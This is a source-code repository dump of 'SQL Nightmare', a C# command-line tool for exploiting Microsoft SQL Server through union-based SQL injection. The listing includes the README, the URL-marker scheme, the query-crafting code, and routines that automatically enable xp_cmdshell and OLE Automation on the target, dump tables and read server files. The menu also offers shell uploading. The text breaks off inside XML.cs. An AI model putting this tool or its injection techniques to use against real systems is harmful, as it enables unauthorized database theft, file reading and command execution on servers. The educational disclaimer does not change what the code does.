├── SQL-nightmare
├── obj
│ └── Debug
│ │ ├── TemporaryGeneratedFile_036C0B5B-1481-4323-8D20-8F5ADCB23D92.cs
│ │ ├── TemporaryGeneratedFile_5937a670-0e60-4077-877b-f7221da3dda1.cs
│ │ ├── TemporaryGeneratedFile_E7A71F73-0F8D-4B9B-B56E-8E70B10BC5D3.cs
│ │ └── SQL-nightmare.csproj.FileListAbsolute.txt
├── App.config
├── bin
│ └── Debug
│ │ ├── SQL-nightmare.exe.config
│ │ ├── SQL-nightmare.vshost.exe.config
│ │ └── SQL-nightmare.vshost.exe.manifest
├── FileIO.cs
├── Properties
│ └── AssemblyInfo.cs
├── Exploitation.cs
├── Program.cs
├── UserInteraction.cs
├── Log.cs
├── QueryCrafter.cs
├── HTTPMethods.cs
├── ResponseFilter.cs
├── ReadFile.cs
├── XML.cs
├── SQL-nightmare.csproj
├── DirListing.cs
├── DumpData.cs
├── ShellSpawning.cs
└── QueriesDB.cs
├── SQL-nightmare.sln
├── LICENSE
└── README.md
/SQL-nightmare/obj/Debug/TemporaryGeneratedFile_036C0B5B-1481-4323-8D20-8F5ADCB23D92.cs:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/SQL-nightmare/obj/Debug/TemporaryGeneratedFile_5937a670-0e60-4077-877b-f7221da3dda1.cs:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/SQL-nightmare/obj/Debug/TemporaryGeneratedFile_E7A71F73-0F8D-4B9B-B56E-8E70B10BC5D3.cs:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/SQL-nightmare/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/SQL-nightmare/bin/Debug/SQL-nightmare.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/SQL-nightmare/bin/Debug/SQL-nightmare.vshost.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/SQL-nightmare/bin/Debug/SQL-nightmare.vshost.exe.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
--------------------------------------------------------------------------------
/SQL-nightmare/obj/Debug/SQL-nightmare.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | c:\users\neo root\documents\visual studio 2013\Projects\SQL-nightmare\SQL-nightmare\bin\Debug\SQL-nightmare.exe.config
2 | c:\users\neo root\documents\visual studio 2013\Projects\SQL-nightmare\SQL-nightmare\obj\Debug\SQL-nightmare.csprojResolveAssemblyReference.cache
3 | c:\users\neo root\documents\visual studio 2013\Projects\SQL-nightmare\SQL-nightmare\bin\Debug\SQL-nightmare.exe
4 | c:\users\neo root\documents\visual studio 2013\Projects\SQL-nightmare\SQL-nightmare\bin\Debug\SQL-nightmare.pdb
5 | c:\users\neo root\documents\visual studio 2013\Projects\SQL-nightmare\SQL-nightmare\obj\Debug\SQL-nightmare.exe
6 | c:\users\neo root\documents\visual studio 2013\Projects\SQL-nightmare\SQL-nightmare\obj\Debug\SQL-nightmare.pdb
7 |
--------------------------------------------------------------------------------
/SQL-nightmare/FileIO.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 | using System.IO;
5 |
6 | namespace SQL_nightmare
7 | {
class FileIO
{
    /// <summary>
    /// Removes <paramref name="fileName"/> if it exists. Intended for the
    /// scratch files the tool writes while parsing server output (e.g. tmp.txt).
    /// IO or permission errors are not caught here and reach the caller.
    /// </summary>
    public static void deleteTempFile(string fileName)
    {
        bool present = File.Exists(fileName);
        if (!present)
            return;

        File.Delete(fileName);
    }

    /// <summary>
    /// Creates (or overwrites) <paramref name="fileName"/> and writes
    /// <paramref name="contents"/> into it. The name is whatever the caller
    /// supplies -- callers in this project pass operator-typed names and no
    /// path or character sanitising happens here.
    /// </summary>
    /// <returns>true when the write completed; false if anything threw (the error is logged).</returns>
    public static bool createWriteFile(string contents, string fileName)
    {
        StreamWriter writer = null;
        try
        {
            writer = new StreamWriter(fileName);
            writer.Write(contents);
            writer.Flush();
            return true;
        }
        catch (Exception ex)
        {
            Log.logError(ex.Message);
            return false;
        }
        finally
        {
            if (writer != null)
                writer.Dispose();
        }
    }
}
34 | }
35 |
--------------------------------------------------------------------------------
/SQL-nightmare.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2013
4 | VisualStudioVersion = 12.0.21005.1
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SQL-nightmare", "SQL-nightmare\SQL-nightmare.csproj", "{EA751B20-26A5-463B-9B2C-3B85ED0A73D5}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {EA751B20-26A5-463B-9B2C-3B85ED0A73D5}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {EA751B20-26A5-463B-9B2C-3B85ED0A73D5}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {EA751B20-26A5-463B-9B2C-3B85ED0A73D5}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {EA751B20-26A5-463B-9B2C-3B85ED0A73D5}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | EndGlobal
23 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | The MIT License (MIT)
2 |
3 | Copyright (c) 2015 Rummy Khan
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy of
6 | this software and associated documentation files (the "Software"), to deal in
7 | the Software without restriction, including without limitation the rights to
8 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
9 | the Software, and to permit persons to whom the Software is furnished to do so,
10 | subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
17 | FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
18 | COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
19 | IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
20 | CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # SQL Nightmare
A Microsoft SQL Server exploitation tool that works through a union-based SQL injection point reached over HTTP GET.
3 |
4 | #### Executable
This repository is source only; a prebuilt `SQL-nightmare.exe` is offered at [SQL Nightmare](https://www.dropbox.com/s/tld2ta55rajgcgf/SQL-nightmare.exe?dl=0). That binary is unsigned and no checksum is published for it, so build from source (the included Visual Studio 2013 solution) if you need to verify what you run.
6 |
7 | #### Functions
1. Directory listing on the database server.
2. Database dump (tables, columns, rows).
3. Reading files from the database server.
4. Shell spawning.
12 |
13 | #### Input URL Format
14 | `http://localhost:1234/index.aspx?param=1 AND 0 union select 1,'rummykhan',2 --X-`
15 |
In your own union payload, put the literal `'rummykhan'` in the column that reflects a string onto the page and end the query with the comment marker `--X-`. The tool rewrites exactly those two markers to build every request, so the URL must be otherwise complete and working.
17 |
18 | #### Disclaimer
1. This software was written for educational purposes only.
2. Do not run it against any system without the owner's prior (ideally written) authorization. Note that as soon as a URL is entered the tool tries to enable OLE Automation procedures and xp_cmdshell on the target (see `Exploitation.cs`); that is a server configuration change, so it is intrusive and likely to show up in the target's logs — make sure it is inside the scope you were given.
21 |
22 |
23 | #### Contact
24 | Drop me an email at rehan_manzoor@outlook.com
25 |
26 | #### MIT License
27 | This software is licensed under [The MIT License (MIT)](LICENSE).
28 |
29 |
30 | #### With Love for
31 | | Lafangoo | Connecting | Ch3rn0by1 | exploiter-z | PMH`s Str!k3r | Makman | Madcode | g00n | benzi | Ricardo | Ajkaro | SOG | Jin | Zee-PK | Gujjar | Ashx | h98d (Hussein) | Muhammad Bilal |
--------------------------------------------------------------------------------
/SQL-nightmare/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
[assembly: AssemblyTitle("SQL-nightmare")]
// The descriptive fields below are left at the Visual Studio template defaults (empty).
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("SQL-nightmare")]
[assembly: AssemblyCopyright("Copyright © 2015")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("612b3038-cb9a-4462-b8f3-854500a7f846")]

// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
// Pinned to 1.0.0.0 (no '*' wildcard), so builds are not auto-numbered.
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/SQL-nightmare/Exploitation.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 |
5 | namespace SQL_nightmare
6 | {
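class Exploitation
{
    /// <summary>
    /// Runs both server-side enabling steps against the injection URL:
    /// OLE Automation procedures first, then xp_cmdshell. Each step logs its
    /// own result; nothing is returned, so the caller (Program.Main) goes on
    /// to the menu even when one or both steps failed.
    /// NOTE: both steps change the target's server configuration. The exact
    /// statements live in QueriesDB, which is not part of this listing.
    /// </summary>
    public static void initialize(string url)
    {
        enableOLEAutomation(url);
        enableXPCMDShell(url);
    }

    /// <summary>Sends the OLE Automation enabling statement; true when the confirmation token came back.</summary>
    public static bool enableOLEAutomation(string url)
    {
        return enableServerOption(url, QueriesDB.EnableOLEAutomation,
            "OLE Automation Enabled..",
            "Failed to Enable OLE Automation Procedures..");
    }

    /// <summary>Sends the xp_cmdshell enabling statement; true when the confirmation token came back.</summary>
    public static bool enableXPCMDShell(string url)
    {
        return enableServerOption(url, QueriesDB.EnableXPCMDShell,
            "XP CMD Shell Enabled..",
            "Failed to Enable XP CMD Shell..");
    }

    /// <summary>
    /// Shared implementation of the two enable* methods: the stacked statement
    /// replaces the --X- marker, the 'rummykhan' column marker is swapped for
    /// the confirmation token, and the request counts as successful when the
    /// token appears in the response body.
    /// Caveat: a positive result only shows that the union row was rendered; it
    /// is not direct proof that the stacked statement itself executed.
    /// </summary>
    private static bool enableServerOption(string url, string stackedQuery, string successMessage, string failureMessage)
    {
        string requestUrl = QueryCrafter.constructStackedQuery(url, stackedQuery);
        requestUrl = requestUrl.Replace("'rummykhan'", QueriesDB.Replacement);

        if (ResponseFilter.confirmResponce(requestUrl, QueriesDB.Replacement))
        {
            Log.logOutput(successMessage);
            return true;
        }

        Log.logError(failureMessage);
        return false;
    }
}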
43 | }
44 |
--------------------------------------------------------------------------------
/SQL-nightmare/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 |
7 | namespace SQL_nightmare
8 | {
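class Program
{
    /// <summary>
    /// Interactive entry point. Reads injection URLs from stdin until 'x'
    /// (or end of input). For each URL it first runs Exploitation.initialize,
    /// which tries to enable OLE Automation and xp_cmdshell on the target,
    /// and then shows the feature menu until '0' is chosen.
    /// </summary>
    static void Main(string[] args)
    {
        QueriesDB.initialize();
        UserInteraction.showBanner();

        while (true)
        {
            Log.logNotification("Press 'x' for exit..");
            UserInteraction.promptForUserInput("Enter url");
            string basicURL = Console.ReadLine();

            // null means stdin was closed: leave instead of spinning forever.
            if (basicURL == null || basicURL == "x")
                break;

            // An empty line is not a URL; re-prompt without touching the network.
            if (String.IsNullOrEmpty(basicURL))
                continue;

            // Only contact the target once the line is known to be a URL. This
            // used to run before the 'x' check, so quitting sent a request to
            // the literal "x" and printed a spurious URI error.
            Exploitation.initialize(basicURL);

            int choice = -1;
            while (choice != 0)
            {
                choice = UserInteraction.showMenuForIntChoice("Press '0' for Exit..\nPress '1' for directory navigation..\nPress '2' for dumping data.." +
                    "\nPress '3' for files reading..\nPress '4' for shell uploading..");

                switch (choice)
                {
                    case 1:
                        DirListing.initialize(basicURL);
                        break;
                    case 2:
                        DumpData.initialize(basicURL);
                        break;
                    case 3:
                        ReadFile.Read(basicURL);
                        break;
                    case 4:
                        ShellSpawning.Spawn(basicURL);
                        break;
                }
            }
        }

        Log.logOutput("Program is going to exit.. Press any key..");
        // ReadKey throws when stdin is not a console (piped input).
        if (!Console.IsInputRedirected)
            Console.ReadKey();
    }
}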
55 | }
56 |
--------------------------------------------------------------------------------
/SQL-nightmare/UserInteraction.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 |
5 | namespace SQL_nightmare
6 | {
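class UserInteraction
{
    // One generator for the whole run. `new Random()` on every call is seeded
    // from the clock on .NET Framework, so two saves in quick succession could
    // draw the same suffix and the second file would overwrite the first.
    private static readonly Random suffixSource = new Random();

    /// <summary>Prints the greeting banner and sets the console title.</summary>
    public static void showBanner()
    {
        Console.Title = "rummykhan's SQLi";
        Console.ForegroundColor = ConsoleColor.Red;
        Console.WriteLine("\t\t\t\t: Love For :\n | Lafangoo | Ch3rn0by1 | Connecting | exploiter-z | Gujjar (PCP) | rootxx |\n\t |PMH's Str!k3r -" +
            "Rafay Baloch -Jin -hussein(h98d) -Zen -Rahul| \n\t\t|MakMan--madCodE--Blackhawk--Ajkaro--benzi| ");
        Console.WriteLine();
    }

    /// <summary>
    /// Asks the operator for a base name and returns "&lt;name&gt;&lt;random&gt;.txt".
    /// The name is used verbatim: no path separator or invalid-character
    /// filtering, so it can point anywhere the operator's account can write.
    /// Closed stdin yields just the numeric suffix plus ".txt".
    /// </summary>
    public static string takeInputForTableFileGeneration()
    {
        promptForUserInput("Enter Name for File");
        string baseName = Console.ReadLine();

        string suffix = suffixSource.Next(123456789).ToString();
        return baseName + suffix + ".txt";
    }

    /// <summary>Writes a blue prompt ("message :: ") without a newline.</summary>
    public static void promptForUserInput(string message)
    {
        Console.ForegroundColor = ConsoleColor.Blue;
        Console.Write(message + " :: ");
    }

    /// <summary>
    /// Shows a menu and parses the reply as an integer. Returns -1 (after
    /// logging "Bad input") when the reply is not a number. Closed stdin
    /// returns 0, which every caller treats as "exit", so menus cannot loop
    /// forever when input runs out.
    /// </summary>
    public static int showMenuForIntChoice(string message)
    {
        promptForUserInput(message);

        string reply = Console.ReadLine();
        if (reply == null)
            return 0;

        int parsed;
        if (int.TryParse(reply, out parsed))
            return parsed;

        Log.logError("Bad input");
        return -1;
    }

    /// <summary>Prompts and returns the raw line typed; null when stdin is closed (callers must handle that).</summary>
    public static string takeInputString(string message)
    {
        promptForUserInput(message);
        return Console.ReadLine();
    }
}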
56 | }
57 |
--------------------------------------------------------------------------------
/SQL-nightmare/Log.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 |
5 | namespace SQL_nightmare
6 | {
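class Log
{
    // All three writers change the process-wide console colour and nothing
    // in this file resets it, so the terminal keeps the last colour used.

    /// <summary>Red line of the form "[ERROR] message [ERROR]".</summary>
    public static void logError(string message)
    {
        Console.ForegroundColor = ConsoleColor.Red;
        Console.WriteLine("[ERROR] " + message + " [ERROR]");
    }

    /// <summary>Green line with the message as-is.</summary>
    public static void logOutput(string message)
    {
        Console.ForegroundColor = ConsoleColor.Green;
        Console.WriteLine(message);
    }

    /// <summary>Gray line of the form "[INFO] message".</summary>
    public static void logNotification(string message)
    {
        Console.ForegroundColor = ConsoleColor.Gray;
        Console.WriteLine("[INFO] " + message);
    }

    /// <summary>
    /// Prints a numbered list framed by "--[ title(s) START ]--" / END lines.
    /// A null array is reported through logError instead of being left to
    /// throw and be caught (the previous version used the exception for that).
    /// </summary>
    public static void showObjects(string[] objects, string title)
    {
        if (objects == null)
        {
            logError("No " + title + " objects to show");
            return;
        }

        logOutput("--[ " + title + "(s) START ]--");
        for (int i = 0; i < objects.Length; i++)
        {
            logOutput("[" + (i + 1) + "] = " + objects[i]);
        }
        logOutput("--[ " + title + "(s) END ]--");
    }

    /// <summary>
    /// Same as the array overload but framed by "--[ title START ]--" / END
    /// (no "(s)" suffix). Null lists are reported through logError.
    /// </summary>
    public static void showObjects(List<string> objects, string title)
    {
        if (objects == null)
        {
            logError("No " + title + " objects to show");
            return;
        }

        logOutput("--[ " + title + " START ]--");
        for (int i = 0; i < objects.Count; i++)
        {
            logOutput("[" + (i + 1) + "] = " + objects[i]);
        }
        logOutput("--[ " + title + " END ]--");
    }
}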
62 | }
63 |
--------------------------------------------------------------------------------
/SQL-nightmare/QueryCrafter.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 |
5 | namespace SQL_nightmare
6 | {
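class QueryCrafter
{
    // Markers the operator places in the injection URL (see README): the union
    // column that reflects a string, and the trailing comment. Every method
    // below is a plain textual substitution on these markers; nothing here
    // escapes, quotes or URL-encodes what it splices in, so the URL is sent
    // exactly as built.
    public const string ColumnMarker = "'rummykhan'";
    public const string BareColumnMarker = "rummykhan";
    public const string CommentMarker = "--X-";

    /// <summary>
    /// Redirects the union row to the tool's scratch table: the string column
    /// becomes "oxp" and " FROM xrummyTables" is inserted before the comment.
    /// </summary>
    public static string constructURLForOutputFromTempTable(string url)
    {
        string rewritten = url.Replace(ColumnMarker, "oxp");
        return rewritten.Replace(CommentMarker, " FROM xrummyTables" + CommentMarker);
    }

    /// <summary>Appends a stacked statement (a DROP, by the caller's naming) in place of the comment marker.</summary>
    public static string constructURLForDroppingObject(string url, string dropTableStackedQuery)
    {
        return constructStackedQuery(url, dropTableStackedQuery);
    }

    /// <summary>
    /// Replaces only the bare marker text, keeping the surrounding quotes, so the
    /// page reflects <paramref name="_replacement"/> as a literal string that the
    /// caller can search the response for.
    /// </summary>
    public static string constructURLForConfirmation(string url, string _replacement)
    {
        return url.Replace(BareColumnMarker, _replacement);
    }

    /// <summary>Confirmation token in the string column plus a stacked statement at the end.</summary>
    public static string construcQueryForTableDump(string url, string stackedQuery, string _replacement)
    {
        string confirmable = constructURLForConfirmation(url, _replacement);
        return constructStackedQuery(confirmable, stackedQuery);
    }

    /// <summary>
    /// Fills the [TABLENAME] placeholder of a query template with the table name
    /// as a single-quoted literal. A quote inside the name is not escaped and
    /// would break the query.
    /// </summary>
    public static string constructQueryForColumns(string columnStackedQuery, string tableName)
    {
        return columnStackedQuery.Replace("[TABLENAME]", "'" + tableName + "'");
    }

    /// <summary>
    /// Puts the dump query where the string column was, then replaces the bare
    /// token TABLENAME so a [TABLENAME] placeholder in the template turns into
    /// the bracket-quoted identifier [tableName] (presumably how
    /// QueriesDB.TableDumpQuery is written -- it is not in this listing).
    /// </summary>
    public static string constructQueryForDataDump(string url, string tableName, string tableDumpQuery)
    {
        string withQuery = url.Replace(ColumnMarker, tableDumpQuery);
        return withQuery.Replace("TABLENAME", tableName);
    }

    /// <summary>Replaces the comment marker with a stacked statement.</summary>
    public static string constructStackedQuery(string url, string queryToAttachAtEnd)
    {
        return url.Replace(CommentMarker, queryToAttachAtEnd);
    }

    /// <summary>Replaces the quoted string column with a subquery/expression.</summary>
    public static string constructQueryForSelectObject(string url, string objectVerifyingQuery)
    {
        return url.Replace(ColumnMarker, objectVerifyingQuery);
    }
}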
56 | }
57 |
--------------------------------------------------------------------------------
/SQL-nightmare/HTTPMethods.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 | using System.Web;
5 | using System.Net;
6 | using System.IO;
7 |
8 | namespace SQL_nightmare
9 | {
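class HTTPMethods
{
    // Time allowed for the response headers. Raised well above the 100 s default,
    // presumably because the injected statements can be slow on the target.
    private const int RequestTimeoutMs = 500000;

    /// <summary>
    /// Issues a GET for <paramref name="url"/> and returns the HTML-decoded body.
    /// Error status codes (which HttpWebRequest surfaces as WebException) are
    /// read and returned the same way, because the injected output may be on an
    /// error page. Returns null when no body could be read; the reason is logged.
    /// </summary>
    /// <remarks>
    /// The URL is sent as built by QueryCrafter: no encoding is applied to the
    /// injected SQL. System proxy settings and default TLS certificate
    /// validation apply; no validation callback is overridden and none should be.
    /// </remarks>
    public static string getResponse(string url)
    {
        try
        {
            HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url);
            request.Method = "GET";
            request.Timeout = RequestTimeoutMs;

            using (WebResponse response = request.GetResponse())
            {
                return readDecodedBody(response);
            }
        }
        catch (WebException wc)
        {
            // 4xx/5xx land here with a Response attached; no Response at all
            // means a network-level failure (timeout, refused, DNS).
            WebResponse errorResponse = wc.Response;
            if (errorResponse == null)
            {
                Log.logError("Plz check you internet connection OR website has blocked you ip - TimeOUT");
                return null;
            }
            using (errorResponse)
            {
                return readDecodedBody(errorResponse);
            }
        }
        catch (UriFormatException ex)
        {
            Log.logError(ex.Message);
            return null;
        }
        catch (NotSupportedException ex)
        {
            // WebRequest.Create has no handler for this URI scheme.
            Log.logError(ex.Message);
            return null;
        }
        catch (InvalidCastException ex)
        {
            // A non-HTTP scheme (e.g. ftp://) yields a request that is not an HttpWebRequest.
            Log.logError(ex.Message);
            return null;
        }
    }

    /// <summary>Reads the whole response body and decodes HTML entities so the injected markers and payload come back as written.</summary>
    private static string readDecodedBody(WebResponse response)
    {
        using (Stream stream = response.GetResponseStream())
        using (StreamReader reader = new StreamReader(stream))
        {
            string contents = reader.ReadToEnd();
            return HttpUtility.HtmlDecode(contents);
        }
    }
}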
60 | }
61 |
--------------------------------------------------------------------------------
/SQL-nightmare/ResponseFilter.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 |
5 | namespace SQL_nightmare
6 | {
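class ResponseFilter
{
    // The injected queries wrap their output as "x102x:<content>:x102y" so it
    // can be located anywhere inside the returned page.
    private const string StartMarker = "x102x:";
    private const string EndMarker = ":x102y";

    /// <summary>Splits a raw response on ':'; null in, null out.</summary>
    public static string[] parseResponce(string response)
    {
        if (response == null)
            return null;

        return response.Split(':');
    }

    /// <summary>
    /// Content between the FIRST start marker and the FIRST end marker, or
    /// null (with an error logged) when the markers are missing or out of order.
    /// </summary>
    public static string getPureResponse(string response)
    {
        if (response == null)
        {
            Log.logError(" while parsing response : no response");
            return null;
        }

        int start = response.IndexOf(StartMarker);
        int end = response.IndexOf(EndMarker);
        return sliceBetween(response, start, end);
    }

    /// <summary>
    /// Same as getPureResponse but anchored on the LAST occurrence of each
    /// marker, for pages that echo the injected query text before the output.
    /// </summary>
    public static string getPureResponseWithLastIndex(string response)
    {
        if (response == null)
        {
            Log.logError(" while parsing response : no response");
            return null;
        }

        int start = response.LastIndexOf(StartMarker);
        int end = response.LastIndexOf(EndMarker);
        return sliceBetween(response, start, end);
    }

    /// <summary>
    /// Shared extraction. Marker positions are validated explicitly instead of
    /// letting Substring throw and catching it.
    /// </summary>
    private static string sliceBetween(string response, int start, int end)
    {
        if (start < 0 || end < 0 || end < start)
        {
            Log.logError(" while parsing response : output markers not found");
            return null;
        }

        string slice = response.Substring(start, end - start);
        // Kept from the original: every occurrence of the start marker inside the
        // slice is stripped, not only the leading one.
        return slice.Replace(StartMarker, "");
    }

    /// <summary>
    /// Requests <paramref name="url"/> and reports whether the body contains
    /// <paramref name="_replacement"/>. A missing body (network/URI failure,
    /// already logged by HTTPMethods) counts as not confirmed.
    /// </summary>
    public static bool confirmResponce(string url, string _replacement)
    {
        string body = HTTPMethods.getResponse(url);
        if (body == null)
        {
            Log.logError("No Responce returned from the Server");
            return false;
        }

        return body.Contains(_replacement);
    }
}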
80 | }
81 |
--------------------------------------------------------------------------------
/SQL-nightmare/ReadFile.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 |
5 | namespace SQL_nightmare
6 | {
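class ReadFile
{
    /// <summary>
    /// Interactive loop: asks for a path on the database server, requests it
    /// through the read-file query and prints what came back between the output
    /// markers, offering to save it locally. 'x' or closed stdin ends the loop.
    /// The path is spliced raw into the URL (no quoting or URL-encoding), so a
    /// path containing a single quote, '&amp;' or '#' will not work as typed.
    /// </summary>
    public static void Read(string url)
    {
        string readTemplate = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ReadFileOpenRowSetQuery);

        while (true)
        {
            string path = UserInteraction.takeInputString("Press x to exit..\nEnter full/root path for file to read.. eg. E:\\inetpub\\site\\somefile.ext ..");
            if (path == null || path == "x")
                break;

            string requestUrl = readTemplate.Replace("[FILENAME]", path);
            string body = HTTPMethods.getResponse(requestUrl);
            if (body == null)
                continue;

            string contents = ResponseFilter.getPureResponseWithLastIndex(body);
            if (contents == null)
            {
                Log.logError("Either File is empty or you 've no right to read that File..");
                continue;
            }

            Log.logOutput("--- [File Contents Start] ---");
            Log.logOutput(contents);
            Log.logOutput("--- [File Cotents End] ---");

            string save = UserInteraction.takeInputString("Press s to save File Or Enter to Ignore..");
            if (save == "s")
                SaveFile(contents);
        }
    }

    /// <summary>
    /// Writes <paramref name="fileContents"/> to a locally chosen file name and
    /// reports the outcome. The success message is only printed when the write
    /// actually succeeded (the earlier version printed it unconditionally).
    /// </summary>
    public static void SaveFile(string fileContents)
    {
        string fileName = UserInteraction.takeInputForTableFileGeneration();

        if (FileIO.createWriteFile(fileContents, fileName))
            Log.logOutput("File saved with name : " + fileName);
        else
            Log.logError("File could not be saved : " + fileName);
    }

    /// <summary>
    /// Non-interactive variant used by other modules: reads one file and returns
    /// its contents with every space removed, or null when nothing usable came
    /// back. The space stripping is kept as-is; presumably the callers (not in
    /// this listing) expect it -- confirm before changing.
    /// </summary>
    public static string ReadFileDirect(string url, string fileName)
    {
        string readTemplate = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ReadFileOpenRowSetQuery);
        string requestUrl = readTemplate.Replace("[FILENAME]", fileName);

        string body = HTTPMethods.getResponse(requestUrl);
        if (body == null)
            return null;

        string contents = ResponseFilter.getPureResponseWithLastIndex(body);
        if (contents == null)
            return null;

        return contents.Replace(" ", "");
    }
}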
76 | }
77 |
--------------------------------------------------------------------------------
/SQL-nightmare/XML.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.IO;
4 | using System.Text;
5 | using System.Xml;
6 |
7 | namespace SQL_nightmare
8 | {
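class XML
{
    /// <summary>
    /// Wraps a response fragment so it has a single root element.
    /// NOTE(review): this listing shows both wrapper strings as empty, so the
    /// function is currently an identity (null becomes ""). The root tags were
    /// presumably lost when the page was extracted -- confirm against the
    /// repository before relying on this.
    /// </summary>
    public static string addRoot(string response)
    {
        return "" + response + "";
    }

    /// <summary>
    /// Loads an XML file that originated from the target server's response,
    /// i.e. untrusted input. DTDs are prohibited and no resolver is attached so
    /// a hostile or compromised target cannot use external entities or entity
    /// expansion against the operator's machine. (The project targets .NET 4.5,
    /// where XmlDocument still follows external references by default; that
    /// default changed in later framework versions.)
    /// </summary>
    private static XmlDocument loadUntrusted(string path)
    {
        XmlReaderSettings settings = new XmlReaderSettings();
        settings.DtdProcessing = DtdProcessing.Prohibit;
        settings.XmlResolver = null;

        XmlDocument document = new XmlDocument();
        document.XmlResolver = null;
        using (XmlReader reader = XmlReader.Create(path, settings))
        {
            document.Load(reader);
        }
        return document;
    }

    /// <summary>
    /// Reads the table dump staged in tmp.txt (written by the caller), prints it
    /// as a table to the console and writes the same rows to
    /// <paramref name="fileNameToWrite"/>. One element per row is expected,
    /// named after <paramref name="tableName"/>, with one attribute per column.
    /// Malformed XML (or a DOCTYPE) throws to the caller, as before.
    /// </summary>
    public static void parseXML(string tableName, string fileNameToWrite, string[] columnsToDisplay)
    {
        const string rule = "---------------------------------------------------------------------------";

        XmlDocument document = loadUntrusted("tmp.txt");
        XmlNodeList rows = document.GetElementsByTagName(tableName);

        using (StreamWriter writer = new StreamWriter(fileNameToWrite))
        {
            // Flush after every line so a partial dump survives an abort.
            writer.AutoFlush = true;

            writer.WriteLine("Table : " + tableName);
            Log.logOutput(rule);
            writer.WriteLine(rule);

            string header = "|";
            foreach (string column in columnsToDisplay)
            {
                header += "\t" + column + "\t|";
            }
            Log.logOutput(header);
            writer.WriteLine(header);

            // Console only: the file deliberately gets no separator here or
            // between rows (kept from the original output format).
            Log.logOutput(rule);

            foreach (XmlNode row in rows)
            {
                string record = "|";
                foreach (XmlAttribute attribute in row.Attributes)
                {
                    record += "\t" + attribute.Value + "\t| ";
                }
                Log.logOutput(record);
                writer.WriteLine(record);
                Log.logOutput(rule);
            }
        }
    }

    /// <summary>
    /// Returns the first attribute value of every <paramref name="tagName"/>
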